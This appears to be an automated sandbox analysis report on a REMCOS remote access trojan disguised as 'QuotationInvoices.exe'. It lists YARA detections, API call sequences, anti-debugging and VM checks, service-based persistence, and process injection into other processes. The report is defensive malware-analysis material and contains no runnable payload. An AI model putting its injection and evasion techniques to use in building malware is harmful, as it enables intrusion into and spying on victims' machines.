Source: 1.2.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.QuotationInvoices.exe.2a70000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.QuotationInvoices.exe.2a70000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 1.1.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: QuotationInvoices.exe

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403486
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00411C7C SetEvent,GetTickCount,Sleep,URLDownloadToFileW,OpenClipboard,CloseClipboard,Sleep,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,EmptyClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,StrToIntA,SetWindowTextW,CreateThread,ShowWindow,SetForegroundWindow,		1_2_00411C7C

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_00407272	0_2_00407272
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_00406A9B	0_2_00406A9B
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_6FC51A98	0_2_6FC51A98
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0044C05A	1_2_0044C05A
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0041A15E	1_2_0041A15E
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0043027D	1_2_0043027D
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0043E200	1_2_0043E200
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0044A217	1_2_0044A217
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0043336D	1_2_0043336D
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00422613	1_2_00422613
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0043768C	1_2_0043768C
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00422756	1_2_00422756
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00433785	1_2_00433785
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_004378BB	1_2_004378BB
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0044A929	1_2_0044A929
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00421A7E	1_2_00421A7E
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00410AC5	1_2_00410AC5
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00437AEA	1_2_00437AEA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00450A80	1_2_00450A80
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00418BDF	1_2_00418BDF
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00433BBA	1_2_00433BBA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00430D20	1_2_00430D20
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0042DD93	1_2_0042DD93
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00432E71	1_2_00432E71
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00421F75	1_2_00421F75
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00433FEF	1_2_00433FEF
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0044C05A	1_1_0044C05A
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0041A15E	1_1_0041A15E
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0043027D	1_1_0043027D
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0043E200	1_1_0043E200
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0044A217	1_1_0044A217
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0043336D	1_1_0043336D

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: String function: 0042F200 appears 71 times
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: String function: 0042EB5C appears 68 times
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: String function: 00404712 appears 31 times
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: String function: 0040412C appears 35 times
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: String function: 00401FCE appears 119 times
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: String function: 00416673 appears 50 times
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: String function: 0040201F appears 35 times
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: String function: 0043D8D6 appears 33 times

Source: QuotationInvoices.exe, 00000000.00000003.659240087.0000000002C06000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QuotationInvoices.exe
Source: QuotationInvoices.exe, 00000000.00000002.666304572.0000000002210000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameAVICAP32.DLL.MUIj% vs QuotationInvoices.exe
Source: QuotationInvoices.exe, 00000000.00000002.666292575.0000000002200000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemsvfw32.dll.muij% vs QuotationInvoices.exe
Source: QuotationInvoices.exe, 00000000.00000002.666244171.00000000021C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs QuotationInvoices.exe

Source: QuotationInvoices.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.2.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.1.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.2.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.QuotationInvoices.exe.2a70000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.QuotationInvoices.exe.2a70000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.1.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/5@53/2

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_00403486
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00413417 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	1_2_00413417
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_00413417 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	1_1_00413417

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 0_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404763

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 0_2_10004243 CreateToolhelp32Snapshot,Process32FirstW,

0_2_10004243

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_0040D246 FindResourceA,LoadResource,LockResource,SizeofResource,

1_2_0040D246

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_00416026 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

1_2_00416026

Source: C:\Users\user\Desktop\QuotationInvoices.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-I9UILL

Source: C:\Users\user\Desktop\QuotationInvoices.exe

File created: C:\Users\user\AppData\Local\Temp\nsh872B.tmp

Jump to behavior

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Software\	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Inj	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Inj	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Inj	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Remcos-I9UILL	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: ProductName	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: origmsc	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Remcos	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: exepath	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: licence	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: exepath	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Administrator	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: User	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: [Info]	1_2_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Software\	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Inj	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Inj	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Inj	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Remcos-I9UILL	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: ProductName	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: origmsc	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Remcos	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: exepath	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: licence	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: exepath	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: Administrator	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: User	1_1_0040C2AA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Command line argument: [Info]	1_1_0040C2AA

Source: QuotationInvoices.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\QuotationInvoices.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\QuotationInvoices.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\QuotationInvoices.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\QuotationInvoices.exe

File read: C:\Users\user\Desktop\QuotationInvoices.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QuotationInvoices.exe 'C:\Users\user\Desktop\QuotationInvoices.exe'
Source: unknown	Process created: C:\Users\user\Desktop\QuotationInvoices.exe 'C:\Users\user\Desktop\QuotationInvoices.exe'
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Process created: C:\Users\user\Desktop\QuotationInvoices.exe 'C:\Users\user\Desktop\QuotationInvoices.exe'	Jump to behavior

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: QuotationInvoices.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: QuotationInvoices.exe, 00000000.00000003.663166783.0000000002B70000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: QuotationInvoices.exe, 00000000.00000003.663166783.0000000002B70000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Unpacked PE file: 1.2.QuotationInvoices.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Unpacked PE file: 1.2.QuotationInvoices.exe.400000.0.unpack

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 0_2_6FC51A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6FC51A98

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_6FC52F60 push eax; ret	0_2_6FC52F8E
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0042F246 push ecx; ret	1_2_0042F259
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_004573ED push esi; ret	1_2_004573F6
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00450448 push eax; ret	1_2_00450466
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0044FB26 push ecx; ret	1_2_0044FB39
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0042F246 push ecx; ret	1_1_0042F259
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_004573ED push esi; ret	1_1_004573F6
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_00450448 push eax; ret	1_1_00450466

Source: initial sample

Static PE information: section name: .data entropy: 7.91289569988

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_00411EA6 URLDownloadToFileW,ShellExecuteW,

1_2_00411EA6

Source: C:\Users\user\Desktop\QuotationInvoices.exe	File created: C:\Users\user\AppData\Local\Temp\nsc875C.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\QuotationInvoices.exe	File created: C:\Users\user\AppData\Local\Temp\xmtfn.dll			Jump to dropped file

Boot Survival:

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_00415DF3 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

1_2_00415DF3

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_0040CEAE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

1_2_0040CEAE

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Delayed program exit found

Show sources

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0040D27D Sleep,ExitProcess,		1_2_0040D27D
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0040D27D Sleep,ExitProcess,		1_1_0040D27D

Source: C:\Users\user\Desktop\QuotationInvoices.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

1_2_00415B21

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Window / User API: threadDelayed 679

Jump to behavior

Source: C:\Users\user\Desktop\QuotationInvoices.exe TID: 6340	Thread sleep count: 679 > 30			Jump to behavior
Source: C:\Users\user\Desktop\QuotationInvoices.exe TID: 6340	Thread sleep time: -6790000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_004081EF GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: je 00408210h		1_2_004081EF
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_004081EF GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: je 00408210h		1_1_004081EF

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405A15
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_004065C1 FindFirstFileA,FindClose,	0_2_004065C1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_004170D3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	1_2_004170D3
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_004451D9 FindFirstFileExA,	1_2_004451D9
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0040A1E5 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	1_2_0040A1E5
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_004073C8 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	1_2_004073C8
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0040782F __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	1_2_0040782F
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00405CDC FindFirstFileW,FindNextFileW,	1_2_00405CDC
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00414E6E FindFirstFileW,FindNextFileW,FindNextFileW,	1_2_00414E6E
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00409FCA FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	1_2_00409FCA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_004170D3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	1_1_004170D3
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_004451D9 FindFirstFileExA,	1_1_004451D9
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0040A1E5 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	1_1_0040A1E5
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_004073C8 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	1_1_004073C8

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_00406496 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

1_2_00406496

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_0042EDE5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_0042EDE5

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 0_2_6FC51A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6FC51A98

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_1000775D mov eax, dword ptr fs:[00000030h]	0_2_1000775D
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_100074AD mov eax, dword ptr fs:[00000030h]	0_2_100074AD
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0043B529 mov eax, dword ptr fs:[00000030h]	1_2_0043B529

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_004464AD GetProcessHeap,

1_2_004464AD

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0042F3CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0042F3CC
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0042EDE5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0042EDE5
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00435E43 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00435E43
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0042EF77 SetUnhandledExceptionFilter,	1_2_0042EF77
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0042F3CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_1_0042F3CC

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_00413BEA __EH_prolog,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

1_2_00413BEA

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Section loaded: unknown target: C:\Users\user\Desktop\QuotationInvoices.exe protection: execute and read and write

Jump to behavior

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe		1_2_0040F31A
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe		1_1_0040F31A

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_004149FD StrToIntA,mouse_event,

1_2_004149FD

Source: C:\Users\user\Desktop\QuotationInvoices.exe

